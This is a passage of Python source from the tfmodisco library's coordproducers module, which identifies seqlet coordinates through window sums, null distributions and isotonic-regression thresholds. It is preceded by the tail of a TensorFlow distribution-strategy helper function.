      'hierarchical_copy'. For `MultiWorkerMirroredStrategy`, valid values are
      'ring' and 'nccl'. If None, DistributionStrategy will choose based on
      device topology.
    num_packs: Optional. Sets the `num_packs` in `tf.distribute.NcclAllReduce`
      or `tf.distribute.HierarchicalCopyAllReduce` for `MirroredStrategy`.

  Returns:
    tf.distribute.DistributionStrategy object.
  Raises:
    ValueError: if `distribution_strategy` is 'off' or 'one_device' and
      `num_gpus` is larger than 1; or `num_gpus` is negative.
  """
  if num_gpus < 0:
    raise ValueError('`num_gpus` can not be negative.')

  distribution_strategy = distribution_strategy.lower()

  if distribution_strategy == 'off':
    if num_gpus > 1:
      raise ValueError(
          'When {} GPUs and {} workers are specified, distribution_strategy '
          'flag cannot be set to "off".'.format(num_gpus, num_workers))
    return None

  if distribution_strategy == 'multi_worker_mirrored':
    return tf.distribute.experimental.MultiWorkerMirroredStrategy(
        communication=_collective_communication(all_reduce_alg))

  # 'default' falls back to one-device when there is at most one GPU.
  if (distribution_strategy == 'one_device' or
      (distribution_strategy == 'default' and num_gpus <= 1)):
    if num_gpus == 0:
      return tf.distribute.OneDeviceStrategy('device:CPU:0')
    else:
      if num_gpus > 1:
        raise ValueError('`OneDeviceStrategy` can not be used for more than '
                         'one device.')
      return tf.distribute.OneDeviceStrategy('device:GPU:0')

  if distribution_strategy in ('mirrored', 'default'):
    if num_gpus == 0:
      # Explicit 'mirrored' with no GPUs mirrors over the CPU only.
      assert distribution_strategy == 'mirrored'
      devices = ['device:CPU:0']
    else:
      devices = ['device:GPU:%d' % i for i in range(num_gpus)]
    return tf.distribute.MirroredStrategy(
        devices=devices,
        cross_device_ops=_mirrored_cross_device_ops(all_reduce_alg, num_packs))

  if distribution_strategy == 'parameter_server':
    return tf.compat.v1.distribute.experimental.ParameterServerStrategy()

  raise ValueError(
      'Unrecognized Distribution Strategy: %r' % distribution_strategy)
def _collective_communication(all_reduce_alg):
  """Return a CollectiveCommunication based on all_reduce_alg.

  Args:
    all_reduce_alg: a string specifying which collective communication to pick,
      or None.

  Returns:
    tf.distribute.experimental.CollectiveCommunication object

  Raises:
    ValueError: if `all_reduce_alg` not in [None, 'ring', 'nccl']
  """
  # None maps to AUTO so the runtime chooses based on topology.
  collective_communication_options = {
      None: tf.distribute.experimental.CollectiveCommunication.AUTO,
      'ring': tf.distribute.experimental.CollectiveCommunication.RING,
      'nccl': tf.distribute.experimental.CollectiveCommunication.NCCL
  }
  if all_reduce_alg not in collective_communication_options:
    raise ValueError(
        'When used with `multi_worker_mirrored`, valid values for '
        'all_reduce_alg are ["ring", "nccl"].  Supplied value: {}'.format(
            all_reduce_alg))
  return collective_communication_options[all_reduce_alg]
def _mirrored_cross_device_ops(all_reduce_alg, num_packs):
  """Return a CrossDeviceOps based on all_reduce_alg and num_packs.

  Args:
    all_reduce_alg: a string specifying which cross device op to pick, or None.
    num_packs: an integer specifying number of packs for the cross device op.

  Returns:
    tf.distribute.CrossDeviceOps object or None.

  Raises:
    ValueError: if `all_reduce_alg` not in [None, 'nccl', 'hierarchical_copy'].
  """
  # None lets MirroredStrategy pick its own cross-device ops.
  if all_reduce_alg is None:
    return None
  mirrored_all_reduce_options = {
      'nccl': tf.distribute.NcclAllReduce,
      'hierarchical_copy': tf.distribute.HierarchicalCopyAllReduce
  }
  if all_reduce_alg not in mirrored_all_reduce_options:
    raise ValueError(
        'When used with `mirrored`, valid values for all_reduce_alg are '
        '["nccl", "hierarchical_copy"].  Supplied value: {}'.format(
            all_reduce_alg))
  cross_device_ops_class = mirrored_all_reduce_options[all_reduce_alg]
  return cross_device_ops_class(num_packs=num_packs)
| 1.765625 | 2 |
modisco/coordproducers.py | Bluedragon137/tfmodisco | 0 | 17675 | from __future__ import division, print_function, absolute_import
from .core import SeqletCoordinates
from modisco import util
import numpy as np
from collections import defaultdict, Counter, OrderedDict
import itertools
import sys
import time
from .value_provider import (
AbstractValTransformer, AbsPercentileValTransformer,
SignedPercentileValTransformer, PrecisionValTransformer)
import scipy
from sklearn.isotonic import IsotonicRegression
SUBSAMPLE_CAP = 1000000
# The only parts of TransformAndThresholdResults that TfModiscoWorkflow uses
# are the transformed_pos/neg_thresholds and the val_transformer (used in
# metaclustering with multiple tasks).
# TransformAndThresholdResults also makes it possible to replicate the
# procedure that was used for identifying coordinates when TfMoDisco was
# first run; the information needed for that is specific to the type of
# CoordProducer used.
class AbstractTransformAndThresholdResults(object):
    """Base container for the thresholds (in transformed space) and the
    value transformer used when seqlet coordinates were identified."""

    def __init__(self, transformed_neg_threshold, transformed_pos_threshold,
                 val_transformer):
        self.transformed_neg_threshold = transformed_neg_threshold
        self.transformed_pos_threshold = transformed_pos_threshold
        self.val_transformer = val_transformer

    @classmethod
    def from_hdf5(cls, grp):
        # Dispatch on the concrete class name stored in the hdf5 attrs;
        # older files without a "class" attr default to FWAC results.
        # NOTE: eval() on the stored name assumes the file is trusted.
        if "class" not in grp.attrs:
            the_class = FWACTransformAndThresholdResults
        else:
            the_class = eval(grp.attrs["class"])
        if (the_class.__name__ != cls.__name__):
            return the_class.from_hdf5(grp)
        # NOTE(review): falls through (returns None) when the stored class
        # equals cls -- subclasses are expected to override from_hdf5.
class BasicTransformAndThresholdResults(AbstractTransformAndThresholdResults):
    """Adds hdf5 round-tripping of the base attributes (thresholds and
    value transformer)."""

    def save_hdf5(self, grp):
        # Record the concrete class name so from_hdf5 can dispatch.
        grp.attrs["class"] = type(self).__name__
        grp.attrs["transformed_neg_threshold"] = self.transformed_neg_threshold
        grp.attrs["transformed_pos_threshold"] = self.transformed_pos_threshold
        self.val_transformer.save_hdf5(grp.create_group("val_transformer"))

    @classmethod
    def load_basic_attrs_from_hdf5(cls, grp):
        # Shared loader so subclasses can reuse it for their own from_hdf5.
        transformed_neg_threshold = grp.attrs['transformed_neg_threshold']
        transformed_pos_threshold = grp.attrs['transformed_pos_threshold']
        val_transformer = AbstractValTransformer.from_hdf5(
                           grp["val_transformer"])
        return (transformed_neg_threshold, transformed_pos_threshold,
                val_transformer)

    @classmethod
    def from_hdf5(cls, grp):
        # NOTE: eval() of the stored class name assumes a trusted file.
        the_class = eval(grp.attrs["class"])
        (transformed_neg_threshold,
         transformed_pos_threshold,
         val_transformer) = cls.load_basic_attrs_from_hdf5(grp)
        return cls(transformed_neg_threshold=transformed_neg_threshold,
                   transformed_pos_threshold=transformed_pos_threshold,
                   val_transformer=val_transformer)
#FWAC = FixedWindowAroundChunks; this TransformAndThresholdResults object
# is specific to the type of info needed in that case.
class FWACTransformAndThresholdResults(
        BasicTransformAndThresholdResults):
    """Results for the FixedWindowAroundChunks coord producer: also keeps
    the thresholds in the *untransformed* score space."""

    def __init__(self, neg_threshold,
                       transformed_neg_threshold,
                       pos_threshold,
                       transformed_pos_threshold,
                       val_transformer):
        #both 'transformed_neg_threshold' and 'transformed_pos_threshold'
        # should be positive, i.e. they should be relative to the
        # transformed distribution used to set the threshold, e.g. a
        # cdf value
        self.neg_threshold = neg_threshold
        self.pos_threshold = pos_threshold
        super(FWACTransformAndThresholdResults, self).__init__(
            transformed_neg_threshold=transformed_neg_threshold,
            transformed_pos_threshold=transformed_pos_threshold,
            val_transformer=val_transformer)

    def save_hdf5(self, grp):
        # Save the base attrs first, then the raw-space thresholds.
        super(FWACTransformAndThresholdResults, self).save_hdf5(grp)
        grp.attrs["neg_threshold"] = self.neg_threshold
        grp.attrs["pos_threshold"] = self.pos_threshold

    @classmethod
    def from_hdf5(cls, grp):
        (transformed_neg_threshold, transformed_pos_threshold,
         val_transformer) = cls.load_basic_attrs_from_hdf5(grp)
        neg_threshold = grp.attrs['neg_threshold']
        pos_threshold = grp.attrs['pos_threshold']
        return cls(neg_threshold=neg_threshold,
                   transformed_neg_threshold=transformed_neg_threshold,
                   pos_threshold=pos_threshold,
                   transformed_pos_threshold=transformed_pos_threshold,
                   val_transformer=val_transformer)
class AbstractCoordProducer(object):
    """Interface for objects that produce candidate seqlet coordinates."""

    def __call__(self):
        raise NotImplementedError()

    @classmethod
    def from_hdf5(cls, grp):
        # Dispatch on the concrete class name stored in the hdf5 attrs.
        # NOTE: eval() of the stored name assumes a trusted file.
        the_class = eval(grp.attrs["class"])
        return the_class.from_hdf5(grp)
class SeqletCoordsFWAP(SeqletCoordinates):
    """
    Coordinates for the FixedWindowAroundChunks CoordProducer
    """

    def __init__(self, example_idx, start, end, score, other_info=None):
        """Args: example_idx/start/end locate the seqlet; score is its
        window score; other_info is an optional dict of auxiliary data."""
        self.score = score
        # Bug fix: the former `other_info={}` mutable default was shared
        # across every instance created without the argument; give each
        # instance its own dict instead.
        self.other_info = {} if other_info is None else other_info
        super(SeqletCoordsFWAP, self).__init__(
            example_idx=example_idx,
            start=start, end=end,
            is_revcomp=False)
class CoordProducerResults(object):
    """Bundle of the produced coordinates plus the transform-and-threshold
    results needed to replicate the thresholding later."""

    def __init__(self, coords, tnt_results):
        self.coords = coords
        self.tnt_results = tnt_results

    @classmethod
    def from_hdf5(cls, grp):
        # Coordinates are stored as their string representation.
        coord_strings = util.load_string_list(dset_name="coords",
                                              grp=grp)
        coords = [SeqletCoordinates.from_string(x) for x in coord_strings]
        tnt_results = AbstractTransformAndThresholdResults.from_hdf5(
                        grp["tnt_results"])
        return CoordProducerResults(coords=coords,
                                    tnt_results=tnt_results)

    def save_hdf5(self, grp):
        util.save_string_list(
            string_list=[str(x) for x in self.coords],
            dset_name="coords",
            grp=grp)
        self.tnt_results.save_hdf5(
              grp=grp.create_group("tnt_results"))
def get_simple_window_sum_function(window_size):
    """Return a function computing sliding-window sums of width window_size.

    The returned function maps a list of 1-D arrays to a list of arrays of
    length len(arr) - window_size + 1 (via a cumulative-sum difference).
    """
    def _window_sum(arrs):
        results = []
        for arr in arrs:
            # Prepend a zero to the cumsum so that
            # padded[i + w] - padded[i] is the sum of arr[i : i + w].
            padded = np.concatenate([[0], np.cumsum(arr)])
            results.append(padded[window_size:] - padded[:-window_size])
        return results
    return _window_sum
class GenerateNullDist(object):
    """Interface for producing a null distribution from observed score tracks."""

    def __call__(self, score_track):
        raise NotImplementedError()
class TakeSign(GenerateNullDist):
    """Null tracks built by replacing each score with its sign (+1/0/-1)."""

    @classmethod
    def from_hdf5(cls, grp):
        raise NotImplementedError()

    # NOTE: first arg named `cls` in the original API; kept for
    # interface compatibility. hdf5 persistence is not implemented.
    def save_hdf(cls, grp):
        raise NotImplementedError()

    def __call__(self, score_track):
        signed_tracks = [np.sign(track) for track in score_track]
        return signed_tracks
class TakeAbs(GenerateNullDist):
    """Null tracks built by replacing each score with its absolute value."""

    @classmethod
    def from_hdf5(cls, grp):
        raise NotImplementedError()

    # NOTE: first arg named `cls` in the original API; kept for
    # interface compatibility. hdf5 persistence is not implemented.
    def save_hdf(cls, grp):
        raise NotImplementedError()

    def __call__(self, score_track):
        abs_tracks = [np.abs(track) for track in score_track]
        return abs_tracks
class LaplaceNullDist(GenerateNullDist):
    """Null distribution from a two-sided Laplace fit to observed window sums.

    The mode mu is located with a two-level histogram; separate exponential
    rates are fit to the positive and negative tails (taking the most
    aggressive rate over several percentiles) and num_to_samp values are
    drawn from the fitted distribution.
    """

    def __init__(self, num_to_samp, verbose=True,
                       percentiles_to_use=[5*(x+1) for x in range(19)],
                       random_seed=1234):
        self.num_to_samp = num_to_samp
        self.verbose = verbose
        self.percentiles_to_use = np.array(percentiles_to_use)
        self.random_seed = random_seed
        self.rng = np.random.RandomState()

    @classmethod
    def from_hdf5(cls, grp):
        num_to_samp = grp.attrs["num_to_samp"]
        verbose = grp.attrs["verbose"]
        percentiles_to_use = np.array(grp["percentiles_to_use"][:])
        # Bug fix: percentiles_to_use was loaded but then dropped, so
        # restored objects silently fell back to the default percentiles.
        return cls(num_to_samp=num_to_samp, verbose=verbose,
                   percentiles_to_use=percentiles_to_use)

    def save_hdf5(self, grp):
        grp.attrs["class"] = type(self).__name__
        grp.attrs["num_to_samp"] = self.num_to_samp
        grp.attrs["verbose"] = self.verbose
        grp.create_dataset('percentiles_to_use',
                           data=self.percentiles_to_use)

    def __call__(self, score_track, window_size, original_summed_score_track):
        #original_summed_score_track is supplied to avoid recomputing it
        if (original_summed_score_track is None):
            window_sum_function = get_simple_window_sum_function(window_size)
            original_summed_score_track = window_sum_function(arrs=score_track)

        values = np.concatenate(original_summed_score_track, axis=0)

        # first estimate mu, using two level histogram to get to 1e-6
        hist1, bin_edges1 = np.histogram(values, bins=1000)
        peak1 = np.argmax(hist1)
        l_edge = bin_edges1[peak1]
        r_edge = bin_edges1[peak1+1]
        top_values = values[ (l_edge < values) & (values < r_edge) ]
        hist2, bin_edges2 = np.histogram(top_values, bins=1000)
        peak2 = np.argmax(hist2)
        l_edge = bin_edges2[peak2]
        r_edge = bin_edges2[peak2+1]
        mu = (l_edge + r_edge) / 2
        if (self.verbose):
            print("peak(mu)=", mu)

        pos_values = [x for x in values if x >= mu]
        neg_values = [x for x in values if x <= mu]
        #for an exponential distribution:
        # cdf = 1 - exp(-lambda*x)
        # exp(-lambda*x) = 1-cdf
        # -lambda*x = log(1-cdf)
        # lambda = -log(1-cdf)/x
        # x = -log(1-cdf)/lambda
        #Take the most aggressive lambda over all percentiles
        pos_laplace_lambda = np.max(
            -np.log(1-(self.percentiles_to_use/100.0))/
            (np.percentile(a=pos_values, q=self.percentiles_to_use)-mu))
        neg_laplace_lambda = np.max(
            -np.log(1-(self.percentiles_to_use/100.0))/
            (np.abs(np.percentile(a=neg_values,
                                  q=100-self.percentiles_to_use)-mu)))

        self.rng.seed(self.random_seed)
        prob_pos = float(len(pos_values))/(len(pos_values)+len(neg_values))
        # Draw samples: pick a side with probability prob_pos, then invert
        # the exponential cdf on that side.
        sampled_vals = []
        for i in range(self.num_to_samp):
            sign = 1 if (self.rng.uniform() < prob_pos) else -1
            if (sign == 1):
                sampled_cdf = self.rng.uniform()
                val = -np.log(1-sampled_cdf)/pos_laplace_lambda + mu
            else:
                sampled_cdf = self.rng.uniform()
                val = mu + np.log(1-sampled_cdf)/neg_laplace_lambda
            sampled_vals.append(val)
        return np.array(sampled_vals)
class FlipSignNullDist(GenerateNullDist):
    """Null distribution from sign-flipped windows of the observed scores.

    Positions whose window sums fall between the lower/upper percentile
    thresholds are retained; sampled stretches of those values receive
    random sign flips (with the empirical positive fraction) and are
    re-summed into null window scores.
    """

    def __init__(self, num_seq_to_samp, shuffle_pos=False,
                       seed=1234, num_breaks=100,
                       lower_null_percentile=20,
                       upper_null_percentile=80):
        self.num_seq_to_samp = num_seq_to_samp
        self.shuffle_pos = shuffle_pos
        self.seed = seed
        self.rng = np.random.RandomState()
        self.num_breaks = num_breaks
        self.lower_null_percentile = lower_null_percentile
        self.upper_null_percentile = upper_null_percentile

    @classmethod
    def from_hdf5(cls, grp):
        raise NotImplementedError()

    def save_hdf(cls, grp):
        raise NotImplementedError()

    def __call__(self, score_track, windowsize, original_summed_score_track):
        #original_summed_score_track is supplied to avoid recomputing it
        window_sum_function = get_simple_window_sum_function(windowsize)
        # Bug fix: the condition was inverted (`is not None`), which
        # recomputed an already-supplied summed track and, when None was
        # passed, left it None and crashed at np.concatenate below. Only
        # recompute when the summed track was NOT supplied (this matches
        # LaplaceNullDist.__call__).
        if (original_summed_score_track is None):
            original_summed_score_track = window_sum_function(arrs=score_track)

        all_orig_summed_scores = np.concatenate(
            original_summed_score_track, axis=0)
        pos_threshold = np.percentile(a=all_orig_summed_scores,
                                      q=self.upper_null_percentile)
        neg_threshold = np.percentile(a=all_orig_summed_scores,
                                      q=self.lower_null_percentile)

        #retain only the portions of the tracks that are under the
        # thresholds
        retained_track_portions = []
        num_pos_vals = 0
        num_neg_vals = 0
        for (single_score_track, single_summed_score_track)\
            in zip(score_track, original_summed_score_track):
            window_passing_track = [
                (1.0 if (x > neg_threshold and x < pos_threshold) else 0)
                for x in single_summed_score_track]
            # Pad so each position knows how many passing windows cover it.
            padded_window_passing_track = [0.0]*int(windowsize-1)
            padded_window_passing_track.extend(window_passing_track)
            padded_window_passing_track.extend([0.0]*int(windowsize-1))
            pos_in_passing_window = window_sum_function(
                                      [padded_window_passing_track])[0]
            assert len(single_score_track)==len(pos_in_passing_window)
            single_retained_track = []
            for (val, pos_passing) in zip(single_score_track,
                                          pos_in_passing_window):
                if (pos_passing > 0):
                    single_retained_track.append(val)
                    num_pos_vals += (1 if val > 0 else 0)
                    num_neg_vals += (1 if val < 0 else 0)
            retained_track_portions.append(single_retained_track)

        print("Fraction of positions retained:",
              sum(len(x) for x in retained_track_portions)/
              sum(len(x) for x in score_track))

        prob_pos = num_pos_vals/float(num_pos_vals + num_neg_vals)
        self.rng.seed(self.seed)
        null_tracks = []
        for i in range(self.num_seq_to_samp):
            # Sample a retained stretch and randomize the signs of its
            # magnitudes using the empirical positive fraction.
            random_track = retained_track_portions[
             int(self.rng.randint(0,len(retained_track_portions)))]
            track_with_sign_flips = np.array([
             abs(x)*(1 if self.rng.uniform() < prob_pos else -1)
             for x in random_track])
            if (self.shuffle_pos):
                self.rng.shuffle(track_with_sign_flips)
            null_tracks.append(track_with_sign_flips)
        return np.concatenate(window_sum_function(null_tracks), axis=0)
def get_null_vals(null_track, score_track, window_size,
                  original_summed_score_track):
    """Obtain null window-sum values, either from a null-distribution
    generator (callable) or from precomputed null tracks (list of arrays)."""
    if (hasattr(null_track, '__call__')):
        # Generator case: delegate; the generator may reuse the supplied
        # summed track to avoid recomputation.
        null_vals = null_track(
            score_track=score_track,
            window_size=window_size,
            original_summed_score_track=original_summed_score_track)
    else:
        # Raw-track case: window-sum the provided null tracks directly.
        window_sum_function = get_simple_window_sum_function(window_size)
        null_summed_score_track = window_sum_function(arrs=null_track)
        null_vals = list(np.concatenate(null_summed_score_track, axis=0))
    return null_vals
def subsample_if_large(arr):
    """Return arr, randomly subsampled (fixed seed) to SUBSAMPLE_CAP
    elements when it is larger than that cap."""
    if len(arr) <= SUBSAMPLE_CAP:
        return arr
    print("Subsampling!")
    sys.stdout.flush()
    # Deterministic subsample without replacement.
    return np.random.RandomState(1234).choice(
        a=arr, size=SUBSAMPLE_CAP, replace=False)
def irval_to_probpos(irval, frac_neg):
    """Convert isotonic-regression output to P(positive), clipped to [0, 1].

    Derivation sketch: with n(x)/p(x) the null/positive pdfs and f_n the
    negative fraction, the isotonic regression yields
    a(x) = o(x)/[o(x) + n(x)] for the observed mixture o(x). Solving for
    the posterior probability of being a positive gives
        p_pos = 1 + f_n * (1 - 1/a(x))
    which is what is computed (and clipped) below. As f_n -> 1,
    p_pos -> 2 - 1/a(x), assuming max(a(x)) = 0.5.
    """
    # Guard against division by ~0 from degenerate IR outputs.
    clipped_irval = np.maximum(irval, 1e-7)
    raw = 1 + frac_neg * (1 - 1.0 / clipped_irval)
    return np.clip(raw, 0.0, 1.0)
class SavableIsotonicRegression(object):
    """Isotonic regression separating observed values from null values,
    storing its training data so it can be persisted to / rebuilt from hdf5.

    The fit labels observed values 1 and null values 0 (null values are
    weighted so both sides contribute equally), producing a monotonic
    precision curve; the minimum precision implies the negative fraction."""

    def __init__(self, origvals, nullvals, increasing, min_frac_neg=0.95):
        self.origvals = origvals
        self.nullvals = nullvals
        self.increasing = increasing
        self.min_frac_neg = min_frac_neg
        self.ir = IsotonicRegression(out_of_bounds='clip',
                    increasing=increasing).fit(
                    X=np.concatenate([self.origvals, self.nullvals], axis=0),
                    y=([1.0 for x in self.origvals] + [0.0 for x in self.nullvals]),
                    sample_weight=([1.0 for x in self.origvals]
                                   +[float(len(self.origvals))/len(self.nullvals)
                                     for x in self.nullvals]))
        #Infer frac_pos based on the minimum value of the ir probs
        #See derivation in irval_to_probpos function
        # (the minimum precision occurs at the extreme x of the fit range).
        min_prec_x = self.ir.X_min_ if self.increasing else self.ir.X_max_
        min_precision = self.ir.transform([min_prec_x])[0]
        implied_frac_neg = -1/(1-(1/max(min_precision,1e-7)))
        print("For increasing =",increasing,", the minimum IR precision was",
              min_precision,"occurring at",min_prec_x,
              "implying a frac_neg",
              "of",implied_frac_neg)
        # Clamp to [min_frac_neg, 1.0] to stay conservative.
        if (implied_frac_neg > 1.0 or implied_frac_neg < self.min_frac_neg):
            implied_frac_neg = max(min(1.0,implied_frac_neg),
                                   self.min_frac_neg)
            print("To be conservative, adjusted frac neg is",implied_frac_neg)
        self.implied_frac_neg = implied_frac_neg

    def transform(self, vals):
        # Map raw values through the IR curve, then to P(positive).
        return irval_to_probpos(self.ir.transform(vals),
                                frac_neg=self.implied_frac_neg)

    def save_hdf5(self, grp):
        grp.attrs['increasing'] = self.increasing
        grp.attrs['min_frac_neg'] = self.min_frac_neg
        grp.create_dataset('origvals', data=self.origvals)
        grp.create_dataset('nullvals', data=self.nullvals)

    @classmethod
    def from_hdf5(cls, grp):
        # Rebuilding refits the regression from the stored training data.
        increasing = grp.attrs['increasing']
        min_frac_neg = grp.attrs['min_frac_neg']
        origvals = np.array(grp['origvals'])
        nullvals = np.array(grp['nullvals'])
        return cls(origvals=origvals, nullvals=nullvals,
                   increasing=increasing, min_frac_neg=min_frac_neg)
def get_isotonic_regression_classifier(orig_vals, null_vals):
    """Fit sign-separated isotonic-regression classifiers on foreground
    vs. null score distributions.

    Both inputs are subsampled first (via subsample_if_large); the
    scores are then split by sign, and one SavableIsotonicRegression is
    fit on the non-negative side (increasing) and, if any negative
    foreground scores exist, one on the negative side (decreasing).

    :return: (pos_ir, neg_ir, subsampled_orig_vals, subsampled_null_vals);
        neg_ir is None when there are no negative foreground scores.
    """
    orig_vals = subsample_if_large(orig_vals)
    null_vals = subsample_if_large(null_vals)
    # Partition foreground scores by sign; the negative side is ordered
    # by magnitude so the decreasing fit sees increasing |score|.
    positive_fg = np.array(sorted(x for x in orig_vals if x >= 0))
    negative_fg = np.array(sorted((x for x in orig_vals if x < 0), key=abs))
    positive_bg = [x for x in null_vals if x >= 0]
    negative_bg = [x for x in null_vals if x < 0]
    pos_ir = SavableIsotonicRegression(
        origvals=positive_fg, nullvals=positive_bg, increasing=True)
    neg_ir = (SavableIsotonicRegression(
                  origvals=negative_fg, nullvals=negative_bg,
                  increasing=False)
              if len(negative_fg) > 0 else None)
    return pos_ir, neg_ir, orig_vals, null_vals
#sliding in this case would be a list of values
class VariableWindowAroundChunks(AbstractCoordProducer):
    """Coordinate producer that scores each position with *multiple*
    sliding-window sizes, maps the window sums to estimated foreground
    precisions via isotonic regression (one classifier per window size
    and sign), and emits seqlet coordinates wherever the best precision
    clears an FDR-derived threshold.

    Compare FixedWindowAroundChunks, which uses a single window size.
    """
    count = 0  # class-level counter used to give saved figure files unique names

    def __init__(self, sliding, flank, suppress, target_fdr,
                       min_passing_windows_frac, max_passing_windows_frac,
                       separate_pos_neg_thresholds,
                       max_seqlets_total,
                       progress_update=5000,
                       verbose=True, plot_save_dir="figures"):
        """
        :param sliding: list of sliding-window sizes to score with
        :param flank: number of positions to expand around each window
        :param suppress: half-width of the non-max-suppression region
        :param target_fdr: target false discovery rate used to derive
            the precision threshold
        :param min_passing_windows_frac: lower bound on the fraction of
            windows allowed to pass the threshold
        :param max_passing_windows_frac: upper bound on the fraction of
            windows allowed to pass the threshold
        :param separate_pos_neg_thresholds: whether positive and negative
            scores are thresholded separately
        :param max_seqlets_total: if not None, keep only the top-|score|
            max_seqlets_total coordinates
        :param progress_update: granularity of progress reporting
        :param verbose: whether to print progress information
        :param plot_save_dir: directory where diagnostic figures are saved
        """
        self.sliding = sliding
        self.flank = flank
        self.suppress = suppress
        self.target_fdr = target_fdr
        assert max_passing_windows_frac >= min_passing_windows_frac
        self.min_passing_windows_frac = min_passing_windows_frac
        self.max_passing_windows_frac = max_passing_windows_frac
        self.separate_pos_neg_thresholds = separate_pos_neg_thresholds
        # BUGFIX: this was previously hard-coded to None, silently
        # discarding the constructor argument (and defeating the
        # save_hdf5/from_hdf5 round-trip of this setting, since
        # save_hdf5 only writes the attribute when it is not None).
        self.max_seqlets_total = max_seqlets_total
        self.progress_update = progress_update
        self.verbose = verbose
        self.plot_save_dir = plot_save_dir

    @classmethod
    def from_hdf5(cls, grp):
        """Reconstruct an instance from an hdf5 group written by save_hdf5."""
        sliding = np.array(grp["sliding"]).astype("int")
        flank = grp.attrs["flank"]
        suppress = grp.attrs["suppress"]
        target_fdr = grp.attrs["target_fdr"]
        min_passing_windows_frac = grp.attrs["min_passing_windows_frac"]
        max_passing_windows_frac = grp.attrs["max_passing_windows_frac"]
        separate_pos_neg_thresholds = grp.attrs["separate_pos_neg_thresholds"]
        # max_seqlets_total is optional in older saves
        if ("max_seqlets_total" in grp.attrs):
            max_seqlets_total = grp.attrs["max_seqlets_total"]
        else:
            max_seqlets_total = None
        progress_update = grp.attrs["progress_update"]
        verbose = grp.attrs["verbose"]
        return cls(sliding=sliding, flank=flank, suppress=suppress,
                    target_fdr=target_fdr,
                    min_passing_windows_frac=min_passing_windows_frac,
                    max_passing_windows_frac=max_passing_windows_frac,
                    separate_pos_neg_thresholds=separate_pos_neg_thresholds,
                    max_seqlets_total=max_seqlets_total,
                    progress_update=progress_update, verbose=verbose)

    def save_hdf5(self, grp):
        """Serialize the configuration (not any fitted state) to hdf5."""
        grp.attrs["class"] = type(self).__name__
        grp.create_dataset("sliding", data=np.array(self.sliding))
        grp.attrs["flank"] = self.flank
        grp.attrs["suppress"] = self.suppress
        grp.attrs["target_fdr"] = self.target_fdr
        grp.attrs["min_passing_windows_frac"] = self.min_passing_windows_frac
        grp.attrs["max_passing_windows_frac"] = self.max_passing_windows_frac
        grp.attrs["separate_pos_neg_thresholds"] =\
            self.separate_pos_neg_thresholds
        if (self.max_seqlets_total is not None):
            grp.attrs["max_seqlets_total"] = self.max_seqlets_total
        grp.attrs["progress_update"] = self.progress_update
        grp.attrs["verbose"] = self.verbose

    def fit_pos_and_neg_irs(self, score_track, null_track):
        """Fit one positive and one negative isotonic-regression
        classifier per sliding-window size.

        :return: (pos_irs, neg_irs), lists parallel to self.sliding;
            entries of neg_irs may be None when no negative scores exist.
        """
        pos_irs = []
        neg_irs = []
        for sliding_window_size in self.sliding:
            window_sum_function = get_simple_window_sum_function(
                                    sliding_window_size)
            print("Fitting - on window size",sliding_window_size)
            # null_track may be a callable that generates null values on
            # demand, or a list of per-example null score arrays.
            if (hasattr(null_track, '__call__')):
                null_vals = null_track(
                    score_track=score_track,
                    window_size=sliding_window_size,
                    original_summed_score_track=None)
            else:
                null_summed_score_track = window_sum_function(arrs=null_track)
                null_vals = np.concatenate(null_summed_score_track,
                                           axis=0)
            print("Computing window sums")
            sys.stdout.flush()
            window_sums_rows = window_sum_function(arrs=score_track)
            print("Done computing window sums")
            sys.stdout.flush()
            # Concatenate once and reuse (previously this concatenation
            # was computed twice and the first result went unused).
            orig_vals = np.concatenate(window_sums_rows, axis=0)
            pos_ir, neg_ir, subsampled_orig_vals, subsampled_null_vals =\
                get_isotonic_regression_classifier(
                    orig_vals=orig_vals,
                    null_vals=null_vals)
            make_nulldist_figure(orig_vals=subsampled_orig_vals,
                                 null_vals=subsampled_null_vals,
                                 pos_ir=pos_ir, neg_ir=neg_ir,
                                 pos_threshold=None,
                                 neg_threshold=None)
            util.show_or_savefig(plot_save_dir=self.plot_save_dir,
                                 filename="scoredist_window"
                                          +str(sliding_window_size)+"_"
                                          +str(VariableWindowAroundChunks.count)
                                          +".png")
            pos_irs.append(pos_ir)
            neg_irs.append(neg_ir)
        return pos_irs, neg_irs

    def __call__(self, score_track, null_track, tnt_results=None):
        """Produce seqlet coordinates from score_track.

        If tnt_results is None, the precision transformer and thresholds
        are fit from the data; otherwise the supplied tnt_results is
        reused (e.g. when applying saved results to new data).
        """
        if (tnt_results is None):
            pos_irs, neg_irs = self.fit_pos_and_neg_irs(
                score_track=score_track,
                null_track=null_track)
            precision_transformer = PrecisionValTransformer(
                sliding_window_sizes=self.sliding,
                pos_irs=pos_irs,
                neg_irs=neg_irs)
            (precisiontransformed_score_track,
             precisiontransformed_bestwindowsizeidxs) =\
                precision_transformer.transform_score_track(
                    score_track=score_track)
            subsampled_prec_vals = subsample_if_large(
                np.concatenate(precisiontransformed_score_track, axis=0))
            # Diagnostic CDF of the transformed precision values
            from matplotlib import pyplot as plt
            plt.plot(sorted(subsampled_prec_vals),
                     (np.arange(len(subsampled_prec_vals))/
                      len(subsampled_prec_vals)))
            plt.xlabel("Tranformed IR precision value")
            plt.ylabel("CDF")
            util.show_or_savefig(plot_save_dir=self.plot_save_dir,
                                 filename="final_prec_vals_cdf_dist"
                                          +str(VariableWindowAroundChunks.count)
                                          +".png")
            # Pick thresholds on the precision-transformed score track,
            # then clamp so the passing fraction stays within bounds.
            pos_threshold = (1-self.target_fdr)
            neg_threshold = -(1-self.target_fdr)
            pos_threshold, neg_threshold =\
                refine_thresholds_based_on_frac_passing(
                    vals=subsampled_prec_vals,
                    pos_threshold=pos_threshold,
                    neg_threshold=neg_threshold,
                    min_passing_windows_frac=self.min_passing_windows_frac,
                    max_passing_windows_frac=self.max_passing_windows_frac,
                    separate_pos_neg_thresholds=self.separate_pos_neg_thresholds,
                    verbose=self.verbose)
            tnt_results = BasicTransformAndThresholdResults(
                            transformed_neg_threshold=neg_threshold,
                            transformed_pos_threshold=pos_threshold,
                            val_transformer=precision_transformer)
        else:
            precision_transformer = tnt_results.val_transformer
            (precisiontransformed_score_track,
             precisiontransformed_bestwindowsizeidxs) =\
                precision_transformer.transform_score_track(
                    score_track=score_track)
        #Need to remove padding because identify_coords is assumed to
        # operate on a scoretrack that has already been processed with
        # a sliding window of window_size (and assumes that partial windows
        # were not included)
        left_padding_to_remove = int((max(self.sliding)-1)/2)
        right_padding_to_remove = (max(self.sliding)-1)-left_padding_to_remove
        coords = identify_coords(
            score_track=[x[left_padding_to_remove:-right_padding_to_remove]
